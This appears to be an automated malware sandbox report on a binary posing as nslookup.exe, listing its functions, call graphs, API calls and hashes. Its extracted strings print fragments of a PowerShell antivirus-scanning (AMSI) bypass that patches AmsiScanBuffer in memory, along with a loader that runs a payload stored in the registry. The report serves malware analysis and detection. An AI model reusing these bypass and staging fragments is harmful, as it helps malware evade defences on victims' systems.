6772->6773 6774 1400084ba 6772->6774 6773->6774 6779 14000847b 6773->6779 6775 140006090 _set_errno_from_matherr 5 API calls 6774->6775 6776 1400084bf 6775->6776 6777 140006070 5 API calls 6776->6777 6778 1400084ac 6777->6778 6778->6768 6778->6769 6779->6778 6780 1400084a4 SetStdHandle 6779->6780 6780->6778 6208 140004c98 6209 140004cb5 GetModuleHandleW 6208->6209 6210 140004cff 6208->6210 6209->6210 6216 140004cc2 6209->6216 6218 140004b90 6210->6218 6212 140004d3b 6213 140004d41 6212->6213 6223 140004d54 6212->6223 6215 140004d53 6216->6210 6230 140004da0 GetModuleHandleExW 6216->6230 6219 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6218->6219 6220 140004bac 6219->6220 6236 140004bc8 6220->6236 6222 140004bb5 6222->6212 6224 140004d61 6223->6224 6225 140004d8e 6224->6225 6227 140004d7d __raise_securityfailure 6224->6227 6226 140004da0 3 API calls 6225->6226 6228 140004d95 ExitProcess 6226->6228 6229 140004d83 TerminateProcess 6227->6229 6229->6225 6231 140004de5 6230->6231 6232 140004dc6 GetProcAddress 6230->6232 6234 140004df5 6231->6234 6235 140004def FreeLibrary 6231->6235 6232->6231 6233 140004ddd 6232->6233 6233->6231 6234->6210 6235->6234 6237 140004c37 6236->6237 6238 140004bde 6236->6238 6237->6222 6238->6237 6240 140005370 6238->6240 6243 14000505c 6240->6243 6242 1400053a5 6242->6237 6244 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6243->6244 6245 140005078 6244->6245 6248 140005248 6245->6248 6247 140005081 6247->6242 6249 140005276 6248->6249 6250 14000526e 6248->6250 6249->6250 6251 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6249->6251 6250->6247 6251->6250 7011 140008798 7012 1400087a4 7011->7012 7014 1400087cb 7012->7014 7015 1400082e4 7012->7015 7016 1400082e9 7015->7016 7020 140008324 7015->7020 7017 14000830a DeleteCriticalSection 7016->7017 7018 14000831c 7016->7018 7017->7017 7017->7018 7019 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7018->7019 7019->7020 7020->7012 6526 14000265c 6527 1400031cc __std_exception_copy 5 API calls 6526->6527 6528 140002685 6527->6528 6947 14000875c 6948 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6947->6948 6949 14000876c 6948->6949 6956 140008334 6949->6956 6951 140008775 6952 140008783 6951->6952 6966 140008560 GetStartupInfoW 6951->6966 6957 140008353 6956->6957 6958 14000837c 6956->6958 6959 140006090 _set_errno_from_matherr 5 API calls 6957->6959 6960 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6958->6960 6961 140008358 6959->6961 6965 140008386 6960->6965 6962 140005f70 _invalid_parameter_noinfo 5 API calls 6961->6962 6963 140008364 6962->6963 6963->6951 6965->6963 6977 14000823c 6965->6977 6967 140008595 6966->6967 6968 14000862f 6966->6968 6967->6968 6969 140008334 6 API calls 6967->6969 6972 140008650 6968->6972 6970 1400085be 6969->6970 6970->6968 6971 1400085e8 GetFileType 6970->6971 6971->6970 6973 14000866e 6972->6973 6974 140008741 6973->6974 6975 1400086c9 GetStdHandle 6973->6975 6974->6952 6975->6973 6976 1400086dc GetFileType 6975->6976 6976->6973 6978 140006840 _invalid_parameter_noinfo 5 API calls 6977->6978 6981 14000825d 6978->6981 6979 1400082bf 6980 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6979->6980 6982 1400082c9 6980->6982 6981->6979 6983 140006520 3 API calls 6981->6983 6982->6965 6983->6981 6529 14000a460 6530 14000a488 6529->6530 6531 14000a49d 6530->6531 6532 14000a4b6 6530->6532 6533 140006090 _set_errno_from_matherr 5 API calls 6531->6533 6535 14000405c 16 API calls 6532->6535 6537 14000a4ad 6532->6537 6534 14000a4a2 6533->6534 6536 140005f70 _invalid_parameter_noinfo 5 API calls 6534->6536 6535->6537 6536->6537 6791 1400090e0 GetProcessHeap 7027 140007fe0 GetCommandLineA GetCommandLineW

                            Executed Functions

                            Function 00000001400011D0 Relevance: 126.8, APIs: 52, Strings: 20, Instructions: 753stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 1400011d0-1400012a4 call 1400020ac lstrcpyW call 140003440 VerSetConditionMask * 3 VerifyVersionInfoW 5 1400012e1-14000133a lstrcatW * 2 lstrlenW call 1400020ac 0->5 6 1400012a6-1400012c2 lstrcatW 0->6 11 140001372-140001385 StrStrIW 5->11 12 14000133c-14000133f 5->12 7 1400012c4 6->7 8 1400012cb-1400012db lstrcatW * 2 6->8 7->8 8->5 14 1400013b3-1400013e6 call 1400020a4 lstrlenW call 1400020ac 11->14 15 140001387-14000138b 11->15 13 140001342-140001370 call 140004018 12->13 13->11 25 1400013e8-1400013ee 14->25 26 140001420-140001433 StrStrIW 14->26 18 140001390-1400013b1 call 140003b30 StrStrIW 15->18 18->14 27 1400013f0-14000141e call 140004018 25->27 28 140001463-140001496 call 1400020a4 lstrlenW call 1400020ac 26->28 29 140001435-140001439 26->29 27->26 39 140001498-14000149e 28->39 40 1400014d0-1400014e3 StrStrIW 28->40 32 140001440-140001461 call 140003b30 StrStrIW 29->32 32->28 41 1400014a0-1400014ce call 140004018 39->41 42 140001513-140001546 call 1400020a4 lstrlenW call 1400020ac 40->42 43 1400014e5-1400014e9 40->43 41->40 53 140001548-14000154e 42->53 54 140001580-140001593 StrStrIW 42->54 45 1400014f0-140001511 call 140003b30 StrStrIW 43->45 45->42 55 140001550-14000157e call 140004018 53->55 56 1400015c3-1400015f6 call 1400020a4 lstrlenW call 1400020ac 54->56 57 140001595-140001599 54->57 55->54 67 1400015f8-1400015fe 56->67 68 140001630-140001643 StrStrIW 56->68 59 1400015a0-1400015c1 call 140003b30 StrStrIW 57->59 59->56 69 140001600-14000162e call 140004018 67->69 70 140001673-1400016a6 call 1400020a4 lstrlenW call 1400020ac 68->70 71 140001645-140001649 68->71 69->68 81 1400016a8-1400016ae 70->81 82 1400016e0-1400016f3 StrStrIW 70->82 73 140001650-140001671 call 140003b30 StrStrIW 71->73 73->70 85 1400016b0-1400016de call 140004018 81->85 83 140001723-140001756 call 1400020a4 lstrlenW call 1400020ac 82->83 84 1400016f5-1400016f9 82->84 95 140001758-14000175e 83->95 96 140001790-1400017a3 StrStrIW 83->96 87 140001700-140001721 call 140003b30 StrStrIW 84->87 85->82 87->83 99 140001760-14000178e call 140004018 95->99 97 1400017d3-140001806 call 1400020a4 lstrlenW call 1400020ac 96->97 98 1400017a5-1400017a9 96->98 109 140001808-14000180e 97->109 110 140001840-140001853 StrStrIW 97->110 100 1400017b0-1400017d1 call 140003b30 StrStrIW 98->100 99->96 100->97 111 140001810-14000183e call 140004018 109->111 112 140001883-1400018b6 call 1400020a4 lstrlenW call 1400020ac 110->112 113 140001855-140001859 110->113 111->110 123 1400018b8-1400018be 112->123 124 1400018f0-140001903 StrStrIW 112->124 114 140001860-140001881 call 140003b30 StrStrIW 113->114 114->112 125 1400018c0-1400018ee call 140004018 123->125 126 140001933-140001966 call 1400020a4 lstrlenW call 1400020ac 124->126 127 140001905-140001909 124->127 125->124 137 140001968-14000196e 126->137 138 1400019a0-1400019b3 StrStrIW 126->138 130 140001910-140001931 call 140003b30 StrStrIW 127->130 130->126 139 140001970-14000199e call 140004018 137->139 140 1400019e3-140001a16 call 1400020a4 lstrlenW call 1400020ac 138->140 141 1400019b5-1400019b9 138->141 139->138 151 140001a18-140001a1e 140->151 152 140001a50-140001a63 StrStrIW 140->152 144 1400019c0-1400019e1 call 140003b30 StrStrIW 141->144 144->140 153 140001a20-140001a4e call 140004018 151->153 154 140001a93-140001ac6 call 1400020a4 lstrlenW call 1400020ac 152->154 155 140001a65-140001a69 152->155 153->152 165 140001ac8-140001ace 154->165 166 140001b00-140001b13 StrStrIW 154->166 157 140001a70-140001a91 call 140003b30 StrStrIW 155->157 157->154 167 140001ad0-140001afe call 140004018 165->167 168 140001b43-140001b76 call 1400020a4 lstrlenW call 1400020ac 166->168 169 140001b15-140001b19 166->169 167->166 179 140001b78-140001b7e 168->179 180 140001bb0-140001bc3 StrStrIW 168->180 171 140001b20-140001b41 call 140003b30 StrStrIW 169->171 171->168 181 140001b80-140001bae call 140004018 179->181 182 140001bf3-140001c26 call 1400020a4 lstrlenW call 1400020ac 180->182 183 140001bc5-140001bc9 180->183 181->180 193 140001c28-140001c2e 182->193 194 140001c60-140001c73 StrStrIW 182->194 185 140001bd0-140001bf1 call 140003b30 StrStrIW 183->185 185->182 197 140001c30-140001c5e call 140004018 193->197 195 140001ca3-140001cdf call 1400020a4 call 140002080 194->195 196 140001c75-140001c79 194->196 199 140001c80-140001ca1 call 140003b30 StrStrIW 196->199 197->194 199->195
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: lstrlen$lstrcat$ConditionMask$InfoVerifyVersionlstrcpy
                            • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                            • API String ID: 1817292742-2621229802
                            • Opcode ID: 8d6989b1108e9b88beed039414c685bac2ea253e79904c4a166511710e458325
                            • Instruction ID: 8c57862f1605238ee2c06bc4a536be4fa76e6f6fb4b7f9c0aaabd00b22a72905
                            • Opcode Fuzzy Hash: 8d6989b1108e9b88beed039414c685bac2ea253e79904c4a166511710e458325
                            • Instruction Fuzzy Hash: 395250B571164082FB4AEF27A8553E923A5AB8DBC0F898125FF0A5B3B5EF79C505C301
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140001000 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 101registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: lstrcat$Resource$ConditionCreateInitializeInstanceMasklstrlen$OpenUninitializeValue$FindInfoLoadLockSizeofVerifyVersionlstrcpy
                            • String ID: C:\Windows\SysWOW64\WindowsPowerShell\v1.0$EXE$SOFTWARE$nslookstager$nslooksvc32$nslooksvc64
                            • API String ID: 4274016003-783316529
                            • Opcode ID: 18d06a2ddba282ea4376cf9ce3791064666aa5ab65ed9ec89cdded3e60b0d305
                            • Instruction ID: f4174b4eb31990f1079580296cf164b7a62c6f1b6a0cee9ae74924327a9c0852
                            • Opcode Fuzzy Hash: 18d06a2ddba282ea4376cf9ce3791064666aa5ab65ed9ec89cdded3e60b0d305
                            • Instruction Fuzzy Hash: 4C4159B5325A4181FB56EB23F8567DA23A0FB8C7C5F841125BB4A4BAF5EE39C104C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000001400021B8 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 59578552-0
                            • Opcode ID: 95cd06912afec0fbb9d61b68d8146c6cdd787134d803784d260b7056c70e2e11
                            • Instruction ID: c92f7cab6b7b37efa7c73ce1c18968b7ed43de86ec2d32a3002d8ea4f202b9b8
                            • Opcode Fuzzy Hash: 95cd06912afec0fbb9d61b68d8146c6cdd787134d803784d260b7056c70e2e11
                            • Instruction Fuzzy Hash: D8E0ECF0E1514286F62FF77728523FD21911B4E3A0F600236B321472F3C93D45969A26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000001400021D4 Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: __scrt_fastfail$__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2735655165-0
                            • Opcode ID: bfa21ae437cee570d5880912c16ca5dfbbe9ea07462fb15988f602eba6af7acb
                            • Instruction ID: 9ada0fb4646a4d2952ff16a43c619abef58bc75c83c31e204f1cfd95f41b0cb1
                            • Opcode Fuzzy Hash: bfa21ae437cee570d5880912c16ca5dfbbe9ea07462fb15988f602eba6af7acb
                            • Instruction Fuzzy Hash: 3B315CF120424085FB2BFBA7F4663E92391AB8D7C4F844425BB490B2F7DE7C89458345
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140001CE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130comCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 300 140001ce0-140001d16 CoInitialize 301 140001eb9-140001ed4 call 140002080 300->301 302 140001d1c-140001d52 CoCreateInstance 300->302 304 140001d58-140001d82 302->304 305 140001eab-140001eb1 CoUninitialize 302->305 308 140001ea1-140001ea5 304->308 309 140001d88-140001d9a 304->309 305->301 308->305 311 140001e97-140001e9b 309->311 312 140001da0-140001db6 309->312 311->308 312->311 314 140001dbc-140001dce 312->314 314->311 316 140001dd4-140001ded 314->316 316->311 318 140001df3-140001e0b 316->318 318->311 320 140001e11-140001e50 318->320 322 140001e52-140001e6c 320->322 323 140001e8d-140001e91 320->323 322->323 325 140001e6e-140001e77 322->325 323->311 326 140001e7d-140001e87 325->326 326->323
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize
                            • String ID: powershell
                            • API String ID: 948891078-744010106
                            • Opcode ID: b5d47aab0c085fc6f5d0370f14531f9d0463baa0622061f89ae37b7216d2e8f1
                            • Instruction ID: 2fcec20f5785c010c2d9eaa8757f35663b4795c3a44e5225b6b59df6a9f9c17c
                            • Opcode Fuzzy Hash: b5d47aab0c085fc6f5d0370f14531f9d0463baa0622061f89ae37b7216d2e8f1
                            • Instruction Fuzzy Hash: 6751D2B2B10A848AE701CF76E8903DD27B5FB88B88F409526EF0D57B28DE39C549C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140001EE0 Relevance: 4.6, APIs: 3, Instructions: 54comCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 327 140001ee0-140001f08 CoInitialize 328 140001f98-140001fb1 call 140002080 327->328 329 140001f0e-140001f42 CoCreateInstance 327->329 330 140001f44-140001f65 329->330 331 140001f8d-140001f93 CoUninitialize 329->331 335 140001f82-140001f87 330->335 336 140001f67-140001f6c 330->336 331->328 335->331 337 140001f72-140001f7c 336->337 337->335
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 948891078-0
                            • Opcode ID: 144a28b6247699ecfe010d9c5c1f4eea69182a90e0887a0d8fa9fb2f193fc2e9
                            • Instruction ID: 0427675daa315fdb8553ced8e820fd3e15db155abe1ee950faa45d10833de8c1
                            • Opcode Fuzzy Hash: 144a28b6247699ecfe010d9c5c1f4eea69182a90e0887a0d8fa9fb2f193fc2e9
                            • Instruction Fuzzy Hash: 2E21C272324B4082E745DF26E88439AB7A5FB88BC4F545026FB8A47B68CF39C449CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140001FC0 Relevance: 4.5, APIs: 3, Instructions: 43comCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 948891078-0
                            • Opcode ID: 0b35923ad0aeec620d72df6b515b73cd9e2fc39d8636088f6dca6bfc77913bfd
                            • Instruction ID: 9c4b1c2941aaf74d21b9dc9fe37141ce250f59d114b31ab7be841ef7d617465f
                            • Opcode Fuzzy Hash: 0b35923ad0aeec620d72df6b515b73cd9e2fc39d8636088f6dca6bfc77913bfd
                            • Instruction Fuzzy Hash: 10111872324B8082E745DF26F88438AB7A5F788BC0F44502ABB8A47B79CE39C4498740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140004D54 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 14e9036ce327040b94fd85b8ac967896ce5c021694fa9181fe595ec70ada6e5e
                            • Instruction ID: bfd4a3926dd071484392c8d5d915de2a2885e5859fdf3ea43dc741f6632be3bf
                            • Opcode Fuzzy Hash: 14e9036ce327040b94fd85b8ac967896ce5c021694fa9181fe595ec70ada6e5e
                            • Instruction Fuzzy Hash: 11E04FF030074482FB6AEB32BC853E92356A78C781F10442DEA4683377CD39C4888711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140004C98 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 367 140004c98-140004cb3 368 140004cb5-140004cc0 GetModuleHandleW 367->368 369 140004cff-140004d3f call 140004b90 367->369 368->369 370 140004cc2-140004cca 368->370 374 140004d41-140004d4b 369->374 375 140004d4c-140004d53 call 140004d54 369->375 370->369 373 140004ccc-140004cd9 370->373 373->369 376 140004cdb-140004ce4 373->376 376->369 378 140004ce6-140004ced 376->378 378->369 380 140004cef-140004cf6 378->380 380->369 381 140004cf8-140004cfa call 140004da0 380->381 381->369
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: HandleModule$AddressFreeLibraryProc
                            • String ID:
                            • API String ID: 3947729631-0
                            • Opcode ID: fce81a9c2fcaf56bb6d8420e324a8bfe5ae2be528d4233720d6a25828c74dc0e
                            • Instruction ID: a7743bdd3df87c81feb5d2f0f613f43867c0dc9b6288f7dd08c2f7f9cd14b3ce
                            • Opcode Fuzzy Hash: fce81a9c2fcaf56bb6d8420e324a8bfe5ae2be528d4233720d6a25828c74dc0e
                            • Instruction Fuzzy Hash: 34216FB2A017408AFB66DF79E4447EC37B1E348748F44453BEB1903AA6DB38C589CB44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 0000000140005D5C Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: 2c2c038a5e3b1d1c29b39802070b86fbb721499a45cafe52499a78438e435fec
                            • Instruction ID: 313c86ce64bb363a182cb27f5b8d9412f177a72ccfbb8e8da6b1dd424d2ca086
                            • Opcode Fuzzy Hash: 2c2c038a5e3b1d1c29b39802070b86fbb721499a45cafe52499a78438e435fec
                            • Instruction Fuzzy Hash: CC315B76214B8086EB65CF26E8443DE73A4F789798F540126EB9D43BA9EF38C255CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000AABC Relevance: 7.8, APIs: 5, Instructions: 321fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 453 14000aabc-14000ab5f GetConsoleCP call 14000405c 456 14000ab65-14000ab6f 453->456 457 14000ae9a 453->457 459 14000ab73-14000ab8a 456->459 458 14000ae9e 457->458 460 14000aeac-14000aee6 call 140002080 458->460 461 14000aea0-14000aea5 458->461 462 14000ad0e-14000ad25 459->462 463 14000ab90-14000aba5 459->463 461->460 465 14000ad27-14000ad46 462->465 466 14000ad48-14000ad56 call 140006118 462->466 467 14000aba9-14000abae 463->467 469 14000ad70-14000ad7d call 140009a88 465->469 477 14000ad58-14000ad5e 466->477 478 14000ad6a 466->478 471 14000abbb-14000abbe 467->471 472 14000abb0-14000abb9 467->472 491 14000af72-14000af76 469->491 492 14000ad83-14000adba call 140008064 469->492 475 14000acb1-14000accc 471->475 476 14000abc4-14000abf1 471->476 472->467 472->471 480 14000acd2-14000ad00 call 14000b8c0 475->480 481 14000aee7-14000aeed 475->481 482 14000abf7-14000abfd 476->482 483 14000ae5f-14000ae65 476->483 486 14000ad64-14000ad68 477->486 487 14000af38-14000af64 477->487 488 14000ad6d 478->488 480->491 505 14000ad06-14000ad0c 480->505 484 14000af31-14000af33 481->484 485 14000aeef-14000af09 481->485 494 14000ac23-14000ac26 482->494 495 14000abff-14000ac06 482->495 489 14000ae94 483->489 490 14000ae67-14000ae6a 483->490 501 14000ae97 484->501 500 14000af0c-14000af2c 485->500 486->488 487->458 488->469 489->501 502 14000ae71-14000ae8f 490->502 491->458 512 14000af84-14000af87 492->512 513 14000adc0-14000ade0 WriteFile 492->513 498 14000ac28-14000ac3a call 140003b30 494->498 499 14000ac3d-14000ac43 494->499 497 14000ac0a-14000ac1e 495->497 497->497 506 14000ac20 497->506 498->499 508 14000ac64-14000ac98 call 14000b8c0 499->508 509 14000ac45 499->509 500->500 510 14000af2e 500->510 501->457 502->502 511 14000ae91 502->511 505->492 506->494 508->491 522 14000ac9e-14000acac 508->522 515 14000ac4c-14000ac62 509->515 510->484 511->489 512->458 517 14000ade6-14000adfa 513->517 518 14000af7b-14000af81 call 14000e018 513->518 515->508 515->515 517->457 521 14000ae00-14000ae05 517->521 518->512 524 14000ae07-14000ae32 WriteFile 521->524 525 14000ae4b-14000ae51 521->525 522->492 526 14000ae38-14000ae3d 524->526 527 14000af69-14000af6f call 14000e018 524->527 525->457 528 14000ae53-14000ae5a 525->528 526->457 529 14000ae3f-14000ae48 526->529 527->491 528->459 529->525
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: 5ef7af1087c7a8e7be48e6a1a11f233fb9ac17ba864c51c4cfe5f2149e5c165a
                            • Instruction ID: 4e0cce11ff5bdaad7a6fa391402917eead13af23a9c8943a5cb00a957416bb6d
                            • Opcode Fuzzy Hash: 5ef7af1087c7a8e7be48e6a1a11f233fb9ac17ba864c51c4cfe5f2149e5c165a
                            • Instruction Fuzzy Hash: A1D1A0B2708B809AE712CF66E5443DD7BB1F74A7D8F544116EF8A47BA9DA38C15AC300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000001400090E0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            • Opcode ID: 3760536023a7a0084f9fc1ebc8d6c4dc72fe2e3b26b8e374d52cd2af3f56d882
                            • Instruction ID: 564bafd1356223e0270d8fb72979979ce2df0dd9880f0a2c7fe947bf55706a67
                            • Opcode Fuzzy Hash: 3760536023a7a0084f9fc1ebc8d6c4dc72fe2e3b26b8e374d52cd2af3f56d882
                            • Instruction Fuzzy Hash: 18B09234A0BA81C6EA0E6B126C8274422A97B8C750F880218920C52330EB3C00E59700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000C920 Relevance: .0, Instructions: 32COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4261abdbcd26093a6e0c2dd9261226f3ff1e7d4d7e2fc6fb0bd964c57ed1ffb9
                            • Instruction ID: a2cec381f1c5cb8935c8b70a36dfce7d1d7a3b9e76f8d16719536bd815b34dfe
                            • Opcode Fuzzy Hash: 4261abdbcd26093a6e0c2dd9261226f3ff1e7d4d7e2fc6fb0bd964c57ed1ffb9
                            • Instruction Fuzzy Hash: D1F096B27242948BDBAACF2DB85275A77D0F30C3C4F908119E78987B24D63D8061CF48
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140002CF4 Relevance: .0, Instructions: 2COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c1445caa26a304b072041e646faa6bb23e053680ea32fdadc8cf75a4cc13650
                            • Instruction ID: 5b00e86444f2859e0b22f1a0897cc4d4fae77e71b4415575e1e698819c97bd67
                            • Opcode Fuzzy Hash: 8c1445caa26a304b072041e646faa6bb23e053680ea32fdadc8cf75a4cc13650
                            • Instruction Fuzzy Hash: 86A002B1504C40D0E60ACB02F9917D02330F35C380F410852E319530709B389940C300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140003820 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 389 140003820-14000385d 390 140003863-140003866 389->390 391 14000394d 389->391 392 14000394f-14000396b 390->392 393 14000386c 390->393 391->392 394 14000386f 393->394 395 140003945 394->395 396 140003875-140003883 394->396 395->391 397 140003885-140003888 396->397 398 140003890-1400038af call 14000e1b0 396->398 399 140003927-140003936 GetProcAddress 397->399 400 14000388e 397->400 405 1400038b1-1400038ba call 14000e018 398->405 406 140003907-14000391c 398->406 399->395 403 140003938-140003943 399->403 402 1400038fb-140003902 400->402 402->394 403->392 410 1400038e9-1400038f3 405->410 411 1400038bc-1400038d1 call 140005710 405->411 406->399 407 14000391e-140003921 FreeLibrary 406->407 407->399 410->402 411->410 414 1400038d3-1400038e7 call 14000e1b0 411->414 414->406 414->410
                            APIs
                            Strings
                            Memory Dump Source
